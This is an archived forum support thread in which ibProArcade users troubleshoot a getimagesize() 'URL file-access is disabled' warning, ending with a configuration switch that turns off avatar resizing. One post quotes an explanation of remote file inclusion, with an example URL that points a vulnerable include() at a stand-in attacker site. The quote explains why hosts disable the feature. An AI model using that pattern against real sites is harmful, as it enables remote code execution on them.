vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   ibProArcade Archive (https://vborg.vbsupport.ru/forumdisplay.php?f=174)
-   -   Error for upgrade. (https://vborg.vbsupport.ru/showthread.php?t=152424)

anuanu 07-16-2007 03:31 PM

Error for upgrade.
 
Ok so im guessing this is how you use the support for. I appologize for posting in the other thread.

This is my problem:

Code:

Warning: getimagesize() [function.getimagesize]: URL file-access is disabled in the server configuration in /arcade/functions/functions.php on line 908
Someone told me to edit my server config...which i dont know where it is or what to edit.



My temp fix:

functions.php on line 908 i added "//" for getinagesize() and it fixes the error but users avatars arnt displayed in arcade.

MrZeropage 07-16-2007 04:20 PM

Thanks for finally arriving here ;)

You need to use that original getimagesize()-function to display the avatars, and as told before the problem is in your server's configuration, not in ibProArcade:
Quote:

URL file-access is disabled in the server configuration
Please contact your root administrator to adapt your server-settings

anuanu 07-16-2007 05:09 PM

ty for the help. Now my only problem is actually contacting them lol. Some company just bought out the old company and he either doesnt respond to my requests or takes a long time to.

MrZeropage 07-16-2007 06:03 PM

sorry, but there is nothing we can do about that here ;)

patbrandy 07-16-2007 06:30 PM

Hmmm, don't know how fix this problem. No problems in all version incl. 2.6.1, except 2.62
Any hints? safe-mode? I'm not the php/apache crack...

MrZeropage 07-17-2007 06:05 AM

This is a server-configuration-problem, contact your root webmaster.

v2.6.1+ was not resizing avatars, so this worked before, but just make sure to adapt your server-settings and v2.6.2+ will work fine

patbrandy 07-17-2007 11:37 AM

Hi!

Have received the following information about this problem:
Quote:

We recommend to activate you the fopen function purposefully in the respective places in the Scriptcode. Otherwise you have to activate/deactivate alternatively the possibility the FOPEN Wrapper directory to directory over the server interface of the operational readiness level.
:::
Quote:

The global, unrestricted use of the fopen function (fopen() Wrapper) is according to standard deactivated on our servers for safety reasons. Otherwise aggressors would be to be merged potentially in a the position by means of CROSS Site Scripting strange code into your applications. Of course you have to activate the possibility the fopen functions in the places in your applications purposefully again, at which you need them. You find an appropriate guidance in your server interface. Only in absolute exceptional cases (no access to the source code etc..) have additionally the possibility of activating fopen functionality global for a whole listing.
I am not reliably whether I this pre-setting (due to safety aspects) to change am. Or how could one go around the problem alternatively? My avatar's has fixed size. Exclude the getimagesize() block? I think many people has the same problem due to safety aspects...!?

anuanu 07-17-2007 12:23 PM

Quote:

Originally Posted by patbrandy (Post 1293571)
Hi!

Have received the following information about this problem:

:::


I am not reliably whether I this pre-setting (due to safety aspects) to change am. Or how could one go around the problem alternatively? My avatar's has fixed size. Exclude the getimagesize() block? I think many people has the same problem due to safety aspects...!?

Yea my provider told me its turned off due to saftey reasons also...im still trying to ask him to turn it on though or see what it will take to have it on.

talenak 07-18-2007 09:42 AM

Can we disable the resize function? I'd really rather not stare at errors all the time, and I am not going to change hosts for the arcade.

I submitted a ticket to my hosting support. Could someone please advise how to disable the avatar resizing or something in case I get the same "security" response as others have gotten?

My host (surpass) fixed mine. Yay :)

patbrandy 07-18-2007 12:18 PM

Yes, I think exactly the same. I would not like to change the safety parameters of the server! Never touch a running system!
https://vborg.vbsupport.ru/external/2007/07/17.gif

;)

Ev!L ErN!E 07-18-2007 09:31 PM

wtf??? I have to change server settings just for this???? ohhh come on... there has to be another fix for this.

I mean what are you supposed to do if your host doesn't change anything?

also some concerns:

Quote:

By default, URL File Access is disabled because poorly coded or out of date web scripts can be hijacked using remote http:// URL's in include() or require() commands. If, for example, your script was set to include a page name based on the a URL passed to your script such as:

script.php?page=http://bad-hacker-site.com/page.php

if your script.php was set to include($page) this malicious URL could have your script (due to insecure coding) grab the page.php script from a bad site and run it on your site! That script can delete files, send out spam emails, deface your site, and much more... This is why URL file access is disabled by default.
so if this new version is to stop some security issue.... why does it need to enable a feature that could possibly turn into its own security risk????

ranj 07-19-2007 12:56 AM

I had this prob too guys to solve this prob. you have to edit one file.
edit File: -
/arcade/funtions/functions.php

Find
Code:

$check = getimagesize($member_avatar);
                        $avatarwidth  = $check[0];
                        $avatarheight = $check[1];

And Delete these codes

Find
Code:

<img src='{$member_avatar}' border='0' alt='' width='{$avatarwidth}' height='{$avatarheight}' />
and Change {$avatarheight} with the Height of avater you want same with Width.

Eg.
Code:

<img src='{$member_avatar}' border='0' alt='' width='120' height='120' />
I Hope i didn't made mistake And enjoy.

talenak 07-19-2007 01:24 AM

Thanks for your post Ranj! and I completely agree with everything you said Ev!l Ern!e. I hope MrZeroPage reads and agrees also and adds an option to disable this for the people who can't get their host to change things or are unwilling to enable the function for security purposes themselves.

ranj 07-19-2007 01:49 AM

Thanks talenak

I just did it for my friend and when i posted these codes here

MrZeropage 07-19-2007 02:54 PM

I will look for inserting a check for this function ...

Ev!L ErN!E 07-19-2007 03:43 PM

Quote:

Originally Posted by MrZeropage (Post 1295743)
I will look for inserting a check for this function ...

thank you MrZeropage!

in the meantime do you think the edits Ranj posted are ok to do?

anuanu 07-20-2007 03:04 AM

woot woot!!! now i just need the talkerbot todo the same thing!

loonytune15 07-20-2007 06:51 AM

I installed this on one forum and got the same error. I will await for the check before i install on the next..

Ev!L ErN!E 07-21-2007 06:48 PM

any news on the fix for this?

MrZeropage 07-21-2007 08:17 PM

v2.6.3+ will have a fix and even a global switch for image-resizing

and before anybody asks: after soling last two bugs I will release this v2.6.3+

loonytune15 07-22-2007 10:30 AM

cool hope to see it soon..

Ev!L ErN!E 07-22-2007 09:36 PM

Quote:

Originally Posted by MrZeropage (Post 1297685)
v2.6.3+ will have a fix and even a global switch for image-resizing

and before anybody asks: after soling last two bugs I will release this v2.6.3+

awsome thank you!!

AdmiralGeek 07-25-2007 09:37 PM

i changed the functions.php you cant change those security setting unless you have a dedicated server.

And it would be very nice, if the developers would let the people know, if they are implementing such procedures.

For those of us that can not change certain security changes.

It is only fair like.

MrZeropage 07-25-2007 10:07 PM

next release v2.6.3+ has a global switch and some detection-function included :)

kelekian 08-02-2007 10:39 PM

Quote:

Originally Posted by MrZeropage (Post 1301670)
next release v2.6.3+ has a global switch and some detection-function included :)

well, I got this error and I using 2.6.3+, and now? hehe

Ev!L ErN!E 08-03-2007 12:53 AM

Same here, I still get the getimagesize error

Quote:

Warning: getimagesize(): URL file-access is disabled in the server configuration in /arcade/functions/functions.php on line 917

xchewbaka 08-03-2007 03:24 AM

Warning: getimagesize(): URL file-access is disabled in the server configuration

same here , and i donĀ“t want to configure my server for this.

patbrandy 08-03-2007 05:55 AM

Open arcade.php and read the instructions:
Code:

// #################################################################################
// ### some global switches - only change if you are told to for support-reasons ###
// #################################################################################

$DEBUGMODE        = 0;                // 0 = off / 1 = enable the debugmode / 2 = verbose debugging (support only!)
$NATIVEMODE        = 0;                // set this to 1 to disable all Hooks/PlugIns within ibProArcade
$LOGIPS                = 1;                // set this to 0 to disable logging of IP-addresses
$AVATARRESIZE        = 0;                // set this to 0 to disable resizing of avatars or problems with getimagesize()
$FIXSTYLE        = 0;                // set this to 1 if you get empty pages (tournament-creation ect.)
$FIXIE                = 1;                // current workaround to fix problems with IE7

Thanx! Now it works fine without the getimagesize()-Warning ( $AVATARRESIZE= 0; ) !

Ev!L ErN!E 08-03-2007 06:35 AM

Quote:

Originally Posted by patbrandy (Post 1308753)
Open arcade.php and read the instructions:
Code:

// #################################################################################
// ### some global switches - only change if you are told to for support-reasons ###
// #################################################################################

$DEBUGMODE        = 0;                // 0 = off / 1 = enable the debugmode / 2 = verbose debugging (support only!)
$NATIVEMODE        = 0;                // set this to 1 to disable all Hooks/PlugIns within ibProArcade
$LOGIPS                = 1;                // set this to 0 to disable logging of IP-addresses
$AVATARRESIZE        = 0;                // set this to 0 to disable resizing of avatars or problems with getimagesize()
$FIXSTYLE        = 0;                // set this to 1 if you get empty pages (tournament-creation ect.)
$FIXIE                = 1;                // current workaround to fix problems with IE7

Thanx! Now it works fine without the getimagesize()-Warning ( $AVATARRESIZE= 0; ) !


AWsome, thank you very much for posting this.... I would have never thought to look in the arcade.php, it worked just fine, again thanks.

The_Rayman 08-03-2007 07:59 AM

works like a charm here!
thnx for the update mrZeroPage!

MrZeropage 08-03-2007 08:15 PM

I just pinned a thread about this :)


All times are GMT. The time now is 03:28 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01140 seconds
  • Memory Usage 1,808KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (6)bbcode_code_printable
  • (10)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (31)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete